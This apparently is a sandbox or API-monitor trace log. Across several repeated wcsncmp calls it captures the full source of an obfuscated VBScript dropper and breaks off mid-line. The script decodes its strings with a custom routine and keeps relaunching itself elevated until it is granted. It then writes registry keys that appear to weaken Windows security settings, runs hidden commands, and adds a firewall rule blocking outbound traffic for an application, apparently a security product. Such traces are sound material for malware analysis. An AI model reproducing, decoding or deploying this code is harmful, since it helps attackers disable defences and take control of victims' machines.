(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.943] wcsncmp (_String1="en(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.944] wcsncmp (_String1="n(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.944] wcsncmp (_String1="(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.944] wcsncmp (_String1="s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.944] wcsncmp (_String1="1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = 